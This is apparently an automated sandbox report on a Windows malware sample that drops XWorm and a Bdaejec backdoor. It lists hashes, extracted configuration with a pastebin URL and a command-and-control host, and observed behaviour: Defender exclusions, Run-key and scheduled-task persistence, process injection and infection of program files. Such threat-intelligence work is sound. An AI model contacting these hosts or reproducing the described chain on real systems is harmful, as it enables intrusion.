Analysis
-
max time kernel
30s -
max time network
31s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-10-2024 05:53
Static task
static1
General
-
Target
ME77ZTVpfPe1.exe
-
Size
360KB
-
MD5
a0a4c2e4123c895b019404faac31eea5
-
SHA1
18254b9eda5a7d1bb9505cc46b992709029091c8
-
SHA256
1c74716aa959672f89ca6a090cf8aee85eee235980f00cf4a1f049b265b4a836
-
SHA512
3b6f9347cfd753607014147dddd1a60f87a8580f84caba99b72b8b319d1e7b8a52bad76a5d81653fabb083c4a037ed28e4cd4178aecde3a19b1ef419b853709c
-
SSDEEP
6144:KIrgO6OmMo/f7DGUOodFeq4cH0RfWLN0SMJWW6vtuwFi0QRjZj:F8XGPoDeqnUR+N3fVVxM0QRjZj
Malware Config
Extracted
xworm
5.0
K2D8kOjfVfBUprBZ
-
Install_directory
%Temp%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/BSSw6HT3
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0008000000023cdf-85.dat family_xworm behavioral1/memory/452-95-0x00000000000B0000-0x00000000000C8000-memory.dmp family_xworm -
Detects Bdaejec Backdoor. 1 IoCs
Bdaejec is backdoor written in C++.
Processes:
resource yara_rule behavioral1/memory/1692-1110-0x00000000009F0000-0x00000000009F9000-memory.dmp family_bdaejec_backdoor -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid Process procid_target PID 2632 created 628 2632 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpid Process 3848 powershell.exe 3876 powershell.exe 2680 powershell.exe 3144 powershell.exe 4796 powershell.exe 1832 powershell.exe 484 powershell.exe 2632 powershell.EXE -
Downloads MZ/PE file
-
Processes:
resource yara_rule behavioral1/files/0x0007000000023ce3-120.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Powershell.exewww.msedge.exeREHQDPN.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation www.msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation REHQDPN.exe -
Executes dropped EXE 4 IoCs
Processes:
Powershell.exewww.msedge.exewww.DeadSec0000000000-obfusecator.exeREHQDPN.exepid Process 1052 Powershell.exe 452 www.msedge.exe 4808 www.DeadSec0000000000-obfusecator.exe 1692 REHQDPN.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
Powershell.exewww.msedge.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.msedge = "C:\\Windows\\Fonts\\www.msedge.exe" Powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\Windows\\Fonts\\www.DeadSec0000000000-obfusecator.exe" Powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.MsEgeServ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\www.MsEgeServ.com" www.msedge.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.EXEsvchost.exedescription ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\www.MsEgeServ svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid Process procid_target PID 2632 set thread context of 1428 2632 powershell.EXE 113 -
Drops file in Program Files directory 64 IoCs
Processes:
REHQDPN.exedescription ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe REHQDPN.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE REHQDPN.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe REHQDPN.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBridge\SkypeBridge.exe REHQDPN.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe REHQDPN.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe REHQDPN.exe File opened for modification C:\Program Files\7-Zip\7z.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoev.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\PilotshubApp.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\TCUI-App.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe REHQDPN.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe REHQDPN.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe REHQDPN.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\unpack200.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE REHQDPN.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe REHQDPN.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{1E8F5DDF-3FB3-4332-A4CC-B46FF6E6899A}\chrome_installer.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\xjc.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\StoreExperienceHost.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe REHQDPN.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe REHQDPN.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe REHQDPN.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoasb.exe REHQDPN.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE REHQDPN.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe REHQDPN.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe REHQDPN.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe REHQDPN.exe -
Drops file in Windows directory 4 IoCs
Processes:
Powershell.exedescription ioc Process File created C:\Windows\Fonts\www.msedge.exe Powershell.exe File opened for modification C:\Windows\Fonts\www.msedge.exe Powershell.exe File created C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe Powershell.exe File opened for modification C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe Powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ME77ZTVpfPe1.exepowershell.exewww.DeadSec0000000000-obfusecator.exeREHQDPN.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ME77ZTVpfPe1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.DeadSec0000000000-obfusecator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REHQDPN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3616 schtasks.exe 400 schtasks.exe 4528 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4796 powershell.exe 4796 powershell.exe 1832 powershell.exe 1832 powershell.exe 1832 powershell.exe 484 powershell.exe 484 powershell.exe 484 powershell.exe 2632 powershell.EXE 2632 powershell.EXE 2632 powershell.EXE 2632 powershell.EXE 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 3848 powershell.exe 3848 powershell.exe 3848 powershell.exe 1428 dllhost.exe 1428 dllhost.exe 3876 powershell.exe 3876 powershell.exe 3876 powershell.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 2680 powershell.exe 2680 powershell.exe 2680 powershell.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe 1428 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeME77ZTVpfPe1.exepowershell.exewww.msedge.exepowershell.exepowershell.EXEdllhost.exepowershell.exeExplorer.EXEpowershell.exepowershell.exedwm.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4408 ME77ZTVpfPe1.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeDebugPrivilege 452 www.msedge.exe Token: SeDebugPrivilege 484 powershell.exe Token: SeDebugPrivilege 2632 powershell.EXE Token: SeDebugPrivilege 2632 powershell.EXE Token: SeDebugPrivilege 1428 dllhost.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeDebugPrivilege 3876 powershell.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeDebugPrivilege 2680 powershell.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 384 dwm.exe Token: SeCreatePagefilePrivilege 384 dwm.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeDebugPrivilege 3144 powershell.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ME77ZTVpfPe1.exePowershell.exewww.DeadSec0000000000-obfusecator.exepowershell.EXEdllhost.exedescription pid Process procid_target PID 4408 wrote to memory of 4796 4408 ME77ZTVpfPe1.exe 90 PID 4408 wrote to memory of 4796 4408 ME77ZTVpfPe1.exe 90 PID 4408 wrote to memory of 4796 4408 ME77ZTVpfPe1.exe 90 PID 4408 wrote to memory of 1052 4408 ME77ZTVpfPe1.exe 99 PID 4408 wrote to memory of 1052 4408 ME77ZTVpfPe1.exe 99 PID 1052 wrote to memory of 1832 1052 Powershell.exe 100 PID 1052 wrote to memory of 1832 1052 Powershell.exe 100 PID 1052 wrote to memory of 3616 1052 Powershell.exe 102 PID 1052 wrote to memory of 3616 1052 Powershell.exe 102 PID 1052 wrote to memory of 452 1052 Powershell.exe 104 PID 1052 wrote to memory of 452 1052 Powershell.exe 104 PID 1052 wrote to memory of 484 1052 Powershell.exe 105 PID 1052 wrote to memory of 484 1052 Powershell.exe 105 PID 1052 wrote to memory of 400 1052 Powershell.exe 107 PID 1052 wrote to memory of 400 1052 Powershell.exe 107 PID 1052 wrote to memory of 4808 1052 Powershell.exe 109 PID 1052 wrote to memory of 4808 1052 Powershell.exe 109 PID 1052 wrote to memory of 4808 1052 Powershell.exe 109 PID 4808 wrote to memory of 1692 4808 www.DeadSec0000000000-obfusecator.exe 110 PID 4808 wrote to memory of 1692 4808 www.DeadSec0000000000-obfusecator.exe 110 PID 4808 wrote to memory of 1692 4808 www.DeadSec0000000000-obfusecator.exe 110 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 2632 wrote to memory of 1428 2632 powershell.EXE 113 PID 1428 wrote to memory of 628 1428 dllhost.exe 5 PID 1428 wrote to memory of 680 1428 dllhost.exe 7 PID 1428 wrote to memory of 960 1428 dllhost.exe 12 PID 1428 wrote to memory of 384 1428 dllhost.exe 13 PID 1428 wrote to memory of 740 1428 dllhost.exe 14 PID 1428 wrote to memory of 868 1428 dllhost.exe 15 PID 1428 wrote to memory of 1092 1428 dllhost.exe 17 PID 1428 wrote to memory of 1100 1428 dllhost.exe 18 PID 1428 wrote to memory of 1144 1428 dllhost.exe 19 PID 1428 wrote to memory of 1188 1428 dllhost.exe 20 PID 1428 wrote to memory of 1216 1428 dllhost.exe 21 PID 1428 wrote to memory of 1320 1428 dllhost.exe 22 PID 1428 wrote to memory of 1336 1428 dllhost.exe 23 PID 1428 wrote to memory of 1356 1428 dllhost.exe 24 PID 1428 wrote to memory of 1492 1428 dllhost.exe 25 PID 1428 wrote to memory of 1556 1428 dllhost.exe 26 PID 1428 wrote to memory of 1572 1428 dllhost.exe 27 PID 1428 wrote to memory of 1672 1428 dllhost.exe 28 PID 1428 wrote to memory of 1712 1428 dllhost.exe 29 PID 1428 wrote to memory of 1744 1428 dllhost.exe 30 PID 1428 wrote to memory of 1780 1428 dllhost.exe 31 PID 1428 wrote to memory of 1820 1428 dllhost.exe 32 PID 1428 wrote to memory of 1968 1428 dllhost.exe 33 PID 1428 wrote to memory of 1984 1428 dllhost.exe 34 PID 1428 wrote to memory of 1996 1428 dllhost.exe 35 PID 1428 wrote to memory of 1408 1428 dllhost.exe 36 PID 1428 wrote to memory of 2124 1428 dllhost.exe 37 PID 1428 wrote to memory of 2196 1428 dllhost.exe 39 PID 1428 wrote to memory of 2224 1428 dllhost.exe 40 PID 1428 wrote to memory of 2232 1428 dllhost.exe 41 PID 1428 wrote to memory of 2436 1428 dllhost.exe 42 PID 1428 wrote to memory of 2444 1428 dllhost.exe 43 PID 1428 wrote to memory of 2620 1428 dllhost.exe 44 PID 1428 wrote to memory of 2648 1428 dllhost.exe 45 PID 1428 wrote to memory of 2716 1428 dllhost.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d577e440-774b-4dae-b112-1fa244bcd54a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1428
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1144 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2768
-
-
